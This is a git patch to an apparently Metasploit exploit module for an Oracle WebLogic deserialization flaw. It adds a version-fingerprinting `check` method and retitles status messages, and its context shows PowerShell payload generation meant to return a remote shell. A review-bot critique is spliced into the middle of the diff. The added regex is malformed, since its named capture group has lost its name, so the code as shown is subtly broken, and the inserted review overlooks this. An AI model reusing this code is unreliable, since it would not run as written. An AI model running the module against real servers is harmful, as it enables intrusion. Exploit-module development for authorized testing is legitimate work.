From f92d2263d0427bc82bd17e0a8b7c3a1c2f7a6bbf Mon Sep 17 00:00:00 2001
From: Jacob Robles
Date: Tue, 28 Aug 2018 08:09:30 -0500
Subject: [PATCH] Add check to weblogic_deserialize module
---
 .../windows/misc/weblogic_deserialize.rb | 36 +++++++++++++++++--
 1 file changed, 34 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/misc/weblogic_deserialize.rb b/modules/exploits/windows/misc/weblogic_deserialize.rb
index 7d22d3e7b8..b96d3f4071 100644
--- a/modules/exploits/windows/misc/weblogic_deserialize.rb
+++ b/modules/exploits/windows/misc/weblogic_deserialize.rb
@@ -48,6 +48,38 @@ class MetasploitModule < Msf::Exploit::Remote
 'DisclosureDate' => 'Apr 17 2018'))
 end
+ def check
+ connect
+ req = "GET /console/login/LoginForm.jsp HTTP/1.1\n"
+ req << "Host: #{peer}\n\n"
+ sock.put(req)
+
+ res = sock.get_once
+ disconnect
+ return CheckCode::Unknown unless res
+
+ /WebLogic Server Version: (?\d+\.\d+\.\d+\.*\d*)/ =~ res
+ if version
+ version = Gem::Version.new(version)
+ vprint_status(version.to_s)
+
+ case
+ when version.to_s.start_with?('10.3')
+ return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
+ when version.to_s.start_with?('12.1')
+ return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
+ when version.to_s.start_with?('12.2')
+ return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')
+ end
+ end
+
+ if res.include?('Oracle WebLogic Server Administration Console')
+ return CheckCode::Detected
+ end
+
+ CheckCode::Unknown
+ end
+
 def gen_resp
 pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
 pwrshl.gsub!("%COMSPEC%", "cmd.exe")
@@ -149,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
 if @met_sent.include?(client.peerhost) then return end
 @met_sent << client.peerhost
- vprint_status("met_sent: #{@met_sent}")
+ vprint_status("Sending payload to client: #{client.peerhost}")
 # Response format determined by watching network traffic
 # generated by EDB PoC
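Review bot: The version pattern in `check` ends in `\.*\d*`, which also accepts a trailing dot or run of dots, so a banner ending in, say, `10.3.6.` (constructed example) is handed to `Gem::Version.new`, which raises ArgumentError on a malformed string, and the method raises instead of returning a CheckCode. Ending the pattern with `(?:\.\d+)?` keeps the match to three or four numeric components. The probe is also built with bare `\n` line endings while HTTP/1.1 specifies CRLF, so a strict server or intermediary may reject it and the result degrades to Unknown; `"GET /console/login/LoginForm.jsp HTTP/1.1\r\n"` and `"Host: #{peer}\r\n\r\n"` avoid that. `disconnect` runs only on the success path, so wrapping the exchange in `begin ... ensure disconnect end` would release the socket when `sock.put` or `sock.get_once` raises. The `case` covers only the 10.3, 12.1 and 12.2 lines, so any other parsed version falls through to the console-banner test; a short comment above the `case` saying that this is intended would help the next reader.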
@@ -304,7 +336,7 @@ class MetasploitModule < Msf::Exploit::Remote start_service - vprint_status('Sending payload...') + print_status('Sending client object payload...') send_payload_objdata # Need to wait this long to make sure we get a shell back